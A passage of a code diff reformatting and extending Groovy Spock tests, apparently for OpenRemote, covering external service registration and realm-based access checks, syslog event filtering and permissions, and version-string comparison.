+            keycloakTestSetup.serviceUser2.username,
+            keycloakTestSetup.serviceUser2.secret
+            )
+
+    // master service user for multi-tenant logic
+    def superServiceUserAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            keycloakTestSetup.superServiceUser.username,
+            keycloakTestSetup.superServiceUser.secret
+            )
+
+    then: "the users have been authenticated and the tokens are retrieved"
+    conditions.eventually {
+      assert buildingServiceUserAccessToken != null
+      assert regularUserAccessToken != null
+      assert superServiceUserAccessToken != null
     }
+
+    when: "the external service resource is set up"
+    def serverUri = serverUri(serverPort)
+    def buildingExternalServiceResource = getClientApiTarget(serverUri, keycloakTestSetup.realmBuilding.getName(), buildingServiceUserAccessToken).proxy(ExternalServiceResource)
+    def buildingExternalServiceResource2 = getClientApiTarget(serverUri, keycloakTestSetup.realmBuilding.getName(), buildingServiceUser2AccessToken).proxy(ExternalServiceResource)
+    def regularUserExternalServiceResource = getClientApiTarget(serverUri, MASTER_REALM, regularUserAccessToken).proxy(ExternalServiceResource)
+    def superServiceUserExternalServiceResource = getClientApiTarget(serverUri, MASTER_REALM, superServiceUserAccessToken).proxy(ExternalServiceResource)
+
+    then: "the external service resources should be accessible"
+    assert buildingExternalServiceResource != null
+    assert regularUserExternalServiceResource != null
+    assert superServiceUserExternalServiceResource != null
+
+
+    // === Tests related to interacting with the external services resource as a service user for a specific realm ===
+
+    when: "the building service user registers an external service"
+    def buildingExternalService = new ExternalService(
+            serviceId: "building-energy-management",
+            label: "Building Energy Management Service",
+            homepageUrl: "https://local.test/services/building-energy-management/ui",
+            status: ExternalServiceStatus.AVAILABLE,
+            )
+    def registeredBuildingExternalService = buildingExternalServiceResource.registerService(null, buildingExternalService)
+
+    then: "the building external service should be registered and the registered external service should have an instanceId assigned"
+    assert registeredBuildingExternalService.instanceId != 0
+
+    and: "the building external service should be included in the list of external services for the building realm"
+    def buildingServices = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
+    assert buildingServices != null
+    assert buildingServices.size() == 1
+    assert buildingServices[0].serviceId == buildingExternalService.serviceId
+    assert buildingServices[0].label == buildingExternalService.label
+    assert buildingServices[0].realm == buildingExternalService.realm
+    assert buildingServices[0].homepageUrl == buildingExternalService.homepageUrl
+    assert buildingServices[0].status == buildingExternalService.status
+
+    when: "time advanced by 70 seconds, longer than the default registration lease duration"
+    advancePseudoClock(70, TimeUnit.SECONDS)
+
+    then: "the building external service should now be marked as unavailable"
+    externalServiceRegistryService.markExpiredInstancesAsUnavailable()
+    def buildingServiceAfterInstanceExpiry = buildingExternalServiceResource.getService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+    assert buildingServiceAfterInstanceExpiry.status == ExternalServiceStatus.UNAVAILABLE
+
+    when: "the building service user sends a heartbeat"
+    buildingExternalServiceResource.heartbeat(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+
+    then: "the building external service should now be marked as available"
+    def buildingServiceAfterHeartbeat = buildingExternalServiceResource.getService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+    assert buildingServiceAfterHeartbeat.status == ExternalServiceStatus.AVAILABLE
+    when: "another service user tries to send a heartbeat for the same external service"
+    buildingExternalServiceResource2.heartbeat(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+
+    then: "the heartbeat should be rejected, and a forbidden response received"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.getStatusCode()
+      return true
+    }
+
+    when: "another service user tries to de-register the same external service"
+    buildingExternalServiceResource2.deregisterService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+
+    then: "the de-registration should be rejected, and a forbidden response received"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.getStatusCode()
+      return true
+    }
+
+    when: "the building service user de-registers the external service"
+    buildingExternalServiceResource.deregisterService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+
+    then: "the building external service should no longer be included in the list of external services for the building realm"
+    def buildingServicesAfterDeregister = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
+    assert buildingServicesAfterDeregister != null
+    assert buildingServicesAfterDeregister.size() == 0
+
+    when: "the building service user tries to retrieve the now deregistered external service"
+    buildingExternalServiceResource.getService(null, registeredBuildingExternalService.serviceId, registeredBuildingExternalService.instanceId)
+
+    then: "the building service user should receive a 404 not found response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.NOT_FOUND.getStatusCode()
+      return true
+    }
+
+    when: "the building service user tries to retrieve the external services from an inaccessible realm"
+    buildingExternalServiceResource.getServices(null, MASTER_REALM)
+
+    then: "the building service user should receive a 403 forbidden response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.getStatusCode()
+      return true
+    }
+
+    // === Tests related to global service registration and management ===
+
+    when: "the super user registers a global service (master realm + user is super user)"
+    def globalExternalService = new ExternalService(
+            serviceId: "forecasting-service",
+            label: "Forecasting Service",
+            homepageUrl: "https://local.test/services/forecasting-service/ui",
+            status: ExternalServiceStatus.AVAILABLE,
+            )
+    def registeredGlobalExternalService = superServiceUserExternalServiceResource.registerGlobalService(null, globalExternalService)
+
+    then: "the global external service should be registered and the registered external service should have an instanceId assigned"
+    assert registeredGlobalExternalService.instanceId != null
+
+    and: "the global external service should be included in the list of global services"
+    def globalServices = superServiceUserExternalServiceResource.getGlobalServices()
+    assert globalServices != null
+    assert globalServices.size() == 1
+    assert globalServices[0].serviceId == globalExternalService.serviceId
+
+    when: "time advanced by 70 seconds, longer than the default registration lease duration"
+    advancePseudoClock(70, TimeUnit.SECONDS)
+
+    then: "the global external service should now be marked as unavailable"
+    externalServiceRegistryService.markExpiredInstancesAsUnavailable()
+    def globalServiceAfterInstanceExpiry = superServiceUserExternalServiceResource.getService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
+    assert globalServiceAfterInstanceExpiry.status == ExternalServiceStatus.UNAVAILABLE
+
+    when: "the super user sends a heartbeat for the global external service"
+    superServiceUserExternalServiceResource.heartbeat(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
+
+    then: "the global external service should now be marked as available"
+    def globalServiceAfterHeartbeat = superServiceUserExternalServiceResource.getService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
+    assert globalServiceAfterHeartbeat.status == ExternalServiceStatus.AVAILABLE
+
+
+    // === Tests related to interacting with global services as a service user from a realm different from the master realm ===
+
+    when: "the building service user tries to retrieve the global services"
+    def globalServicesForBuildingRealm = buildingExternalServiceResource.getGlobalServices()
+
+    then: "the building service user should receive the global services which includes the newly registered global forecasting service"
+    assert globalServicesForBuildingRealm != null
+    assert globalServicesForBuildingRealm.size() == 1
+    assert globalServicesForBuildingRealm[0].serviceId == registeredGlobalExternalService.serviceId
+
+    when: "the building service user registers a new realm-bound external service"
+    def buildingExternalService2 = new ExternalService(
+            serviceId: "building-energy-management-2",
+            label: "Building Energy Management Service 2",
+            homepageUrl: "https://local.test/services/building-energy-management-2/ui",
+            status: ExternalServiceStatus.AVAILABLE,
+            )
+    def registeredBuildingExternalService2 = buildingExternalServiceResource.registerService(null, buildingExternalService2)
+
+    then: "the building service user should receive the new realm-bound external service"
+    assert registeredBuildingExternalService2.instanceId != null
+
+    when: "the building service user retrieves the global external services"
+    def globalServicesForBuildingRealm2 = buildingExternalServiceResource.getGlobalServices()
+
+    then: "the returned global external services should only include the global forecasting service"
+    assert globalServicesForBuildingRealm2 != null
+    assert globalServicesForBuildingRealm2.size() == 1
+    assert globalServicesForBuildingRealm2[0].serviceId == registeredGlobalExternalService.serviceId
+
+    when: "the building service user retrieves external services from its realm"
+    def buildingServicesForBuildingRealm2 = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
+
+    then: "the returned external services should only include the new realm-bound external service"
+    assert buildingServicesForBuildingRealm2 != null
+    assert buildingServicesForBuildingRealm2.size() == 1
+    assert buildingServicesForBuildingRealm2[0].serviceId == buildingExternalService2.serviceId
+
+    when: "the building service user tries to send a heartbeat for the global external service"
+    buildingExternalServiceResource.heartbeat(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
+
+    then: "the building service user should receive a 403 forbidden response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.getStatusCode()
+      return true
+    }
+
+    when: "the building service user tries to deregister the global external service"
+    buildingExternalServiceResource.deregisterService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
+
+    then: "the building service user should receive a 403 forbidden response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.getStatusCode()
+      return true
+    }
+
+
+    // == Tests related to a regular user trying to interact with external services ===
+
+    when: "the regular user tries to retrieve the global external services"
+
+    def regularUserGlobalServices = regularUserExternalServiceResource.getGlobalServices()
+
+    then: "the regular user should receive a list of all global external services, since they are available to all realms"
+    assert regularUserGlobalServices != null
+    assert regularUserGlobalServices.size() == 1
+    assert regularUserGlobalServices[0].serviceId == registeredGlobalExternalService.serviceId
+
+    when: "the regular user tries to retrieve the external services from its realm"
+    def regularUserRealmServices = regularUserExternalServiceResource.getServices(null, MASTER_REALM)
+
+    then: "the regular user should receive a list of all external services from its realm"
+    assert regularUserRealmServices != null
+    assert regularUserRealmServices.size() == 1
+
+    when: "the regular user tries to retrieve the external services from a realm other than its own"
+    regularUserExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
+
+    then: "the regular user should receive a 403 forbidden response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.getStatusCode()
+      return true
+    }
+
+    when: "the regular user tries to send a heartbeat for an external service"
+    regularUserExternalServiceResource.heartbeat(null, registeredBuildingExternalService2.serviceId, registeredBuildingExternalService2.instanceId)
+
+    then: "the regular user should receive a 401 unauthorized response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
+      return true
+    }
+
+    when: "the regular user tries to deregister an external service"
+    regularUserExternalServiceResource.deregisterService(null, registeredBuildingExternalService2.serviceId, registeredBuildingExternalService2.instanceId)
+
+    then: "the regular user should receive a 401 unauthorized response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
+      return true
+    }
+
+    when: "the regular user tries to register an external service"
+    def regularUserNewService = new ExternalService(
+            serviceId: "regular-user-new-service",
+            label: "Regular User New Service",
+            homepageUrl: "https://local.test/services/regular-user-new-service/ui",
+            status: ExternalServiceStatus.AVAILABLE,
+            )
+    regularUserExternalServiceResource.registerService(null, regularUserNewService)
+
+    then: "the regular user should receive a 401 unauthorized response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
+      return true
+    }
+
+    when: "the regular user tries to register a global external service"
+    regularUserExternalServiceResource.registerGlobalService(null, regularUserNewService)
+
+    then: "the regular user should receive a 401 unauthorized response"
+    ex = thrown(WebApplicationException)
+    ex.response.withCloseable { r ->
+      assert r.status == Response.Status.UNAUTHORIZED.getStatusCode()
+      return true
+    }
+
+
+    // == Additional miscellaneous tests ==
+
+    when: "time advances by 70 seconds, longer than the default registration lease duration"
+    advancePseudoClock(70, TimeUnit.SECONDS)
+
+    then: "the global external service should now be marked as unavailable"
+    externalServiceRegistryService.markExpiredInstancesAsUnavailable()
+    def globalServiceAfterInstanceExpiryMisc = superServiceUserExternalServiceResource.getService(null, registeredGlobalExternalService.serviceId, registeredGlobalExternalService.instanceId)
+    assert globalServiceAfterInstanceExpiryMisc.status == ExternalServiceStatus.UNAVAILABLE
+
+    and: "the building external service should now be marked as unavailable"
+    def buildingServiceAfterInstanceExpiryMisc = buildingExternalServiceResource.getService(null, registeredBuildingExternalService2.serviceId, registeredBuildingExternalService2.instanceId)
+    assert buildingServiceAfterInstanceExpiryMisc.status == ExternalServiceStatus.UNAVAILABLE
+
+    when: "time advances by 24 hours, longer than the default automatic deregistration threshold"
+    advancePseudoClock(24, TimeUnit.HOURS)
+    externalServiceRegistryService.deregisterLongExpiredInstances()
+
+    then: "the building external service should now be deregistered, thus the list of external services for the building realm should be empty"
+    def buildingRealmServices = buildingExternalServiceResource.getServices(null, keycloakTestSetup.realmBuilding.getName())
+    assert buildingRealmServices.size() == 0
+
+    and: "the global external service should now be deregistered, thus the list of global external services should be empty"
+    def globalRealmServices = buildingExternalServiceResource.getGlobalServices()
+    assert globalRealmServices.size() == 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/syslog/SysLogServiceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/syslog/SysLogServiceTest.groovy
@@ -31,56 +31,56 @@ import java.time.Instant
 
 class SysLogServiceTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static SyslogService syslogService
-    @Shared
-    static PersistenceService persistenceService
+  @Shared
+  static SyslogService syslogService
+  @Shared
+  static PersistenceService persistenceService
 
-    def setupSpec() {
-        syslogService = new SyslogService()
-        def container = startContainer(defaultConfig(), defaultServices(syslogService))
-        persistenceService = container.getService(PersistenceService.class)
-        syslogService.clearStoredEvents()
+  def setupSpec() {
+    syslogService = new SyslogService()
+    def container = startContainer(defaultConfig(), defaultServices(syslogService))
+    persistenceService = container.getService(PersistenceService.class)
+    syslogService.clearStoredEvents()
+  }
+
+  def cleanupSpec() {
+    if (syslogService != null) {
+      syslogService.clearStoredEvents()
+    }
+  }
+
+  def "Get events applies filters and pagination"() {
+    given: "syslog events are stored with distinct level/category combinations"
+    Instant now = getInstantTimeOf(container)
+    String subCategory = "SysLogServiceTest-" + UUID.randomUUID()
+    Instant from = now.minusSeconds(600)
+    Instant to = now.plusSeconds(600)
+
+    persistenceService.doTransaction { em ->
+      em.persist(new SyslogEvent(now.minusSeconds(300).toEpochMilli(), SyslogLevel.INFO, SyslogCategory.API, subCategory, "info"))
+      em.persist(new SyslogEvent(now.minusSeconds(200).toEpochMilli(), SyslogLevel.WARN, SyslogCategory.API, subCategory, "warn"))
+      em.persist(new SyslogEvent(now.minusSeconds(100).toEpochMilli(), SyslogLevel.ERROR, SyslogCategory.API, subCategory, "error"))
+      em.persist(new SyslogEvent(now.minusSeconds(50).toEpochMilli(), SyslogLevel.ERROR, SyslogCategory.DATA, subCategory, "other"))
     }
 
-    def cleanupSpec() {
-        if (syslogService != null) {
-            syslogService.clearStoredEvents()
-        }
-    }
+    when: "requesting events for WARN+ API category with a subcategory filter"
+    def result = syslogService.getEvents(SyslogLevel.WARN, 2, 1, from, to, [SyslogCategory.API], [subCategory])
 
-    def "Get events applies filters and pagination"() {
-        given: "syslog events are stored with distinct level/category combinations"
-        Instant now = getInstantTimeOf(container)
-        String subCategory = "SysLogServiceTest-" + UUID.randomUUID()
-        Instant from = now.minusSeconds(600)
-        Instant to = now.plusSeconds(600)
+    then: "only matching events are returned in descending timestamp order"
+    result != null
+    result.key == 2
+    result.value.size() == 2
+    result.value[0].message == "error"
+    result.value[1].message == "warn"
+    result.value.every { it.category == SyslogCategory.API }
+    result.value.every { it.level.ordinal() >= SyslogLevel.WARN.ordinal() }
 
-        persistenceService.doTransaction { em ->
-            em.persist(new SyslogEvent(now.minusSeconds(300).toEpochMilli(), SyslogLevel.INFO, SyslogCategory.API, subCategory, "info"))
-            em.persist(new SyslogEvent(now.minusSeconds(200).toEpochMilli(), SyslogLevel.WARN, SyslogCategory.API, subCategory, "warn"))
-            em.persist(new SyslogEvent(now.minusSeconds(100).toEpochMilli(), SyslogLevel.ERROR, SyslogCategory.API, subCategory, "error"))
-            em.persist(new SyslogEvent(now.minusSeconds(50).toEpochMilli(), SyslogLevel.ERROR, SyslogCategory.DATA, subCategory, "other"))
-        }
+    when: "requesting a limited page size"
+    def limited = syslogService.getEvents(SyslogLevel.WARN, 1, 1, from, to, [SyslogCategory.API], [subCategory])
 
-        when: "requesting events for WARN+ API category with a subcategory filter"
-        def result = syslogService.getEvents(SyslogLevel.WARN, 2, 1, from, to, [SyslogCategory.API], [subCategory])
-
-        then: "only matching events are returned in descending timestamp order"
-        result != null
-        result.key == 2
-        result.value.size() == 2
-        result.value[0].message == "error"
-        result.value[1].message == "warn"
-        result.value.every { it.category == SyslogCategory.API }
-        result.value.every { it.level.ordinal() >= SyslogLevel.WARN.ordinal() }
-
-        when: "requesting a limited page size"
-        def limited = syslogService.getEvents(SyslogLevel.WARN, 1, 1, from, to, [SyslogCategory.API], [subCategory])
-
-        then: "pagination respects the per-page limit"
-        limited.key == 2
-        limited.value.size() == 1
-        limited.value[0].message == "error"
-    }
+    then: "pagination respects the per-page limit"
+    limited.key == 2
+    limited.value.size() == 1
+    limited.value[0].message == "error"
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/syslog/SyslogResourceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/syslog/SyslogResourceTest.groovy
@@ -35,56 +35,56 @@ import static org.openremote.model.Constants.*
 
 class SyslogResourceTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    private static String userId
+  @Shared
+  private static String userId
 
-    def "Users with rules read role cannot retrieve syslog events"() {
-        given: "the server container is started with the syslog resource"
-        def container = startContainer(defaultConfig(), defaultServices(new SyslogService()))
-        def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+  def "Users with rules read role cannot retrieve syslog events"() {
+    given: "the server container is started with the syslog resource"
+    def container = startContainer(defaultConfig(), defaultServices(new SyslogService()))
+    def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        and: "a user has the old rules role but not the logs role"
-        def rulesAccessToken = createUserToken(container, keycloakTestSetup, "read-rules", ClientRole.READ_RULES)
+    and: "a user has the old rules role but not the logs role"
+    def rulesAccessToken = createUserToken(container, keycloakTestSetup, "read-rules", ClientRole.READ_RULES)
 
-        when: "the user requests syslog events"
-        def response = getSyslogEvents(rulesAccessToken)
+    when: "the user requests syslog events"
+    def response = getSyslogEvents(rulesAccessToken)
 
-        then: "the resource rejects the wrong role"
-        response.withCloseable { r ->
-            assert r.status == Response.Status.FORBIDDEN.statusCode
-            return true
-        }
-
-        cleanup: "the test user is removed"
-        deleteUser(identityProvider)
+    then: "the resource rejects the wrong role"
+    response.withCloseable { r ->
+      assert r.status == Response.Status.FORBIDDEN.statusCode
+      return true
     }
 
-    def "Users with logs read role can retrieve syslog events"() {
-        given: "the server container is started with the syslog resource"
-        def container = startContainer(defaultConfig(), defaultServices(new SyslogService()))
-        def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    cleanup: "the test user is removed"
+    deleteUser(identityProvider)
+  }
 
-        and: "a user has the logs role"
-        def logsAccessToken = createUserToken(container, keycloakTestSetup, "read-logs", ClientRole.READ_LOGS)
+  def "Users with logs read role can retrieve syslog events"() {
+    given: "the server container is started with the syslog resource"
+    def container = startContainer(defaultConfig(), defaultServices(new SyslogService()))
+    def identityProvider = container.getService(ManagerIdentityService.class).getIdentityProvider()
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        when: "the user requests syslog events"
-        def response = getSyslogEvents(logsAccessToken)
+    and: "a user has the logs role"
+    def logsAccessToken = createUserToken(container, keycloakTestSetup, "read-logs", ClientRole.READ_LOGS)
 
-        then: "the resource allows the correct role"
-        response.withCloseable { r ->
-            assert r.status == Response.Status.OK.statusCode
-            return true
-        }
+    when: "the user requests syslog events"
+    def response = getSyslogEvents(logsAccessToken)
 
-        cleanup: "the test user is removed"
-        deleteUser(identityProvider)
+    then: "the resource allows the correct role"
+    response.withCloseable { r ->
+      assert r.status == Response.Status.OK.statusCode
+      return true
     }
 
-    private String createUserToken(container, KeycloakTestSetup keycloakTestSetup, String roleName, ClientRole role) {
-        def username = "syslog-test-${roleName}"
-        def user = keycloakTestSetup.createUser(
+    cleanup: "the test user is removed"
+    deleteUser(identityProvider)
+  }
+
+  private String createUserToken(container, KeycloakTestSetup keycloakTestSetup, String roleName, ClientRole role) {
+    def username = "syslog-test-${roleName}"
+    def user = keycloakTestSetup.createUser(
             MASTER_REALM,
             username,
             username,
@@ -93,23 +93,23 @@ class SyslogResourceTest extends Specification implements ManagerContainerTrait 
             "${username}@openremote.local",
             true,
             [role] as ClientRole[]
-        )
+            )
 
-        userId = user.id
-        authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, username, username)
+    userId = user.id
+    authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, username, username)
+  }
+
+  private static void deleteUser(ManagerIdentityProvider identityProvider) {
+    if (userId != null) {
+      identityProvider.deleteUser(MASTER_REALM, userId)
     }
+  }
 
-   private static void deleteUser(ManagerIdentityProvider identityProvider) {
-      if (userId != null) {
-          identityProvider.deleteUser(MASTER_REALM, userId)
-      }
-   }
-
-    private def getSyslogEvents(String accessToken) {
-        getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken)
+  private def getSyslogEvents(String accessToken) {
+    getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken)
             .path("syslog")
             .path("event")
             .request()
             .get()
-    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/system/VersionUtilTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/system/VersionUtilTest.groovy
@@ -25,109 +25,109 @@ import spock.lang.Unroll
 
 class VersionUtilTest extends Specification {
 
-    @Unroll
-    def "compareVersions('#v1', '#v2') should return #expected"() {
-        expect:
-        Integer.signum(VersionUtil.compareVersions(v1, v2)) == Integer.signum(expected)
+  @Unroll
+  def "compareVersions('#v1', '#v2') should return #expected"() {
+    expect:
+    Integer.signum(VersionUtil.compareVersions(v1, v2)) == Integer.signum(expected)
 
-        where:
-        v1          | v2          || expected
-        "1.0.0"     | "1.0.0"     || 0
-        "1.0.0"     | "1.0.1"     || -1
-        "1.0.1"     | "1.0.0"     || 1
-        "1.0"       | "1.0.0"     || 0
-        "1.0.0"     | "1.0"       || 0
-        "2.0.0"     | "1.9.9"     || 1
-        "1.9.9"     | "2.0.0"     || -1
-        "1.2.3"     | "1.2.3.4"   || -1
-        "1.2.3.4"   | "1.2.3"     || 1
-        "10.0.0"    | "2.0.0"     || 1
-        "2.0.0"     | "10.0.0"    || -1
-        "1.0"       | "1.0.0.0"   || 0
-    }
+    where:
+    v1 | v2 || expected
+    "1.0.0" | "1.0.0" || 0
+    "1.0.0" | "1.0.1" || -1
+    "1.0.1" | "1.0.0" || 1
+    "1.0" | "1.0.0" || 0
+    "1.0.0" | "1.0" || 0
+    "2.0.0" | "1.9.9" || 1
+    "1.9.9" | "2.0.0" || -1
+    "1.2.3" | "1.2.3.4" || -1
+    "1.2.3.4" | "1.2.3" || 1
+    "10.0.0" | "2.0.0" || 1
+    "2.0.0" | "10.0.0" || -1
+    "1.0" | "1.0.0.0" || 0
+  }
 
-    @Unroll
-    def "compareVersions with qualifiers: '#v1' vs '#v2'"() {
-        expect:
-        Integer.signum(VersionUtil.compareVersions(v1, v2)) == Integer.signum(expected)
+  @Unroll
+  def "compareVersions with qualifiers: '#v1' vs '#v2'"() {
+    expect:
+    Integer.signum(VersionUtil.compareVersions(v1, v2)) == Integer.signum(expected)
 
-        where:
-        v1              | v2              || expected
-        "1.0.0"         | "1.0.0-SNAPSHOT"|| 0  // numeric parts are equal
-        "1.1.0-SNAPSHOT"| "1.0.0"         || 1  // 1.1 > 1.0
-        "2.0-beta"      | "1.9"           || 1  // 2 > 1
-        "1.0-alpha"     | "1.0-beta"      || 0  // both parse to 1.0
-    }
+    where:
+    v1 | v2 || expected
+    "1.0.0" | "1.0.0-SNAPSHOT"|| 0 // numeric parts are equal
+    "1.1.0-SNAPSHOT"| "1.0.0" || 1 // 1.1 > 1.0
+    "2.0-beta" | "1.9" || 1 // 2 > 1
+    "1.0-alpha" | "1.0-beta" || 0 // both parse to 1.0
+  }
 
-    def "compareVersions should handle empty segments"() {
-        expect:
-        VersionUtil.compareVersions("1..0", "1.0.0") == 0
-        VersionUtil.compareVersions("1.0.", "1.0.0") == 0
-    }
+  def "compareVersions should handle empty segments"() {
+    expect:
+    VersionUtil.compareVersions("1..0", "1.0.0") == 0
+    VersionUtil.compareVersions("1.0.", "1.0.0") == 0
+  }
 
-    def "compareVersions should throw NullPointerException for null inputs"() {
-        when:
-        VersionUtil.compareVersions(null, "1.0.0")
+  def "compareVersions should throw NullPointerException for null inputs"() {
+    when:
+    VersionUtil.compareVersions(null, "1.0.0")
 
-        then:
-        thrown(NullPointerException)
+    then:
+    thrown(NullPointerException)
 
-        when:
-        VersionUtil.compareVersions("1.0.0", null)
+    when:
+    VersionUtil.compareVersions("1.0.0", null)
 
-        then:
-        thrown(NullPointerException)
-    }
+    then:
+    thrown(NullPointerException)
+  }
 
-    def "isVersionGreater should work correctly"() {
-        expect:
-        VersionUtil.isVersionGreater("2.0.0", "1.0.0") == true
-        VersionUtil.isVersionGreater("1.0.0", "2.0.0") == false
-        VersionUtil.isVersionGreater("1.0.0", "1.0.0") == false
-    }
+  def "isVersionGreater should work correctly"() {
+    expect:
+    VersionUtil.isVersionGreater("2.0.0", "1.0.0") == true
+    VersionUtil.isVersionGreater("1.0.0", "2.0.0") == false
+    VersionUtil.isVersionGreater("1.0.0", "1.0.0") == false
+  }
 
-    def "isVersionGreaterOrEqual should work correctly"() {
-        expect:
-        VersionUtil.isVersionGreaterOrEqual("2.0.0", "1.0.0") == true
-        VersionUtil.isVersionGreaterOrEqual("1.0.0", "1.0.0") == true
-        VersionUtil.isVersionGreaterOrEqual("1.0.0", "2.0.0") == false
-    }
+  def "isVersionGreaterOrEqual should work correctly"() {
+    expect:
+    VersionUtil.isVersionGreaterOrEqual("2.0.0", "1.0.0") == true
+    VersionUtil.isVersionGreaterOrEqual("1.0.0", "1.0.0") == true
+    VersionUtil.isVersionGreaterOrEqual("1.0.0", "2.0.0") == false
+  }
 
-    def "isVersionEqual should work correctly"() {
-        expect:
-        VersionUtil.isVersionEqual("1.0.0", "1.0.0") == true
-        VersionUtil.isVersionEqual("1.0", "1.0.0") == true
-        VersionUtil.isVersionEqual("1.0.0", "1.0.1") == false
-    }
+  def "isVersionEqual should work correctly"() {
+    expect:
+    VersionUtil.isVersionEqual("1.0.0", "1.0.0") == true
+    VersionUtil.isVersionEqual("1.0", "1.0.0") == true
+    VersionUtil.isVersionEqual("1.0.0", "1.0.1") == false
+  }
 
-    def "isVersionLess should work correctly"() {
-        expect:
-        VersionUtil.isVersionLess("1.0.0", "2.0.0") == true
-        VersionUtil.isVersionLess("2.0.0", "1.0.0") == false
-        VersionUtil.isVersionLess("1.0.0", "1.0.0") == false
-    }
+  def "isVersionLess should work correctly"() {
+    expect:
+    VersionUtil.isVersionLess("1.0.0", "2.0.0") == true
+    VersionUtil.isVersionLess("2.0.0", "1.0.0") == false
+    VersionUtil.isVersionLess("1.0.0", "1.0.0") == false
+  }
 
-    def "isVersionLessOrEqual should work correctly"() {
-        expect:
-        VersionUtil.isVersionLessOrEqual("1.0.0", "2.0.0") == true
-        VersionUtil.isVersionLessOrEqual("1.0.0", "1.0.0") == true
-        VersionUtil.isVersionLessOrEqual("2.0.0", "1.0.0") == false
-    }
+  def "isVersionLessOrEqual should work correctly"() {
+    expect:
+    VersionUtil.isVersionLessOrEqual("1.0.0", "2.0.0") == true
+    VersionUtil.isVersionLessOrEqual("1.0.0", "1.0.0") == true
+    VersionUtil.isVersionLessOrEqual("2.0.0", "1.0.0") == false
+  }
 
-    def "parsePart should handle various formats"() {
-        expect:
-        VersionUtil.parsePart("123") == 123
-        VersionUtil.parsePart("1-SNAPSHOT") == 1
-        VersionUtil.parsePart("42-alpha") == 42
-        VersionUtil.parsePart("0") == 0
-        VersionUtil.parsePart("") == 0
-        VersionUtil.parsePart("beta") == 0
-    }
+  def "parsePart should handle various formats"() {
+    expect:
+    VersionUtil.parsePart("123") == 123
+    VersionUtil.parsePart("1-SNAPSHOT") == 1
+    VersionUtil.parsePart("42-alpha") == 42
+    VersionUtil.parsePart("0") == 0
+    VersionUtil.parsePart("") == 0
+    VersionUtil.parsePart("beta") == 0
+  }
 
-    def "loadVersion should load manager version from resources"() {
-        expect:
-        !VersionInfo.loadVersion().isBlank()
-        VersionInfo.loadVersion() == VersionInfo.VERSION
-        VersionInfo.loadVersion() == VersionInfo.getManagerVersion()
-    }
+  def "loadVersion should load manager version from resources"() {
+    expect:
+    !VersionInfo.loadVersion().isBlank()
+    VersionInfo.loadVersion() == VersionInfo.VERSION
+    VersionInfo.loadVersion() == VersionInfo.getManagerVersion()
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/users/UserResourceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/users/UserResourceTest.groovy
@@ -49,713 +49,706 @@ import static org.openremote.model.security.User.EMAIL_NOTIFICATIONS_DISABLED_AT
 
 class UserResourceTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static UserResource adminUserResource
-    @Shared
-    static UserResource regularUserMasterResource
-    @Shared
-    static UserResource regularUserBuildingResource
-    @Shared
-    static UserResource adminUserBuildingResource
-    @Shared
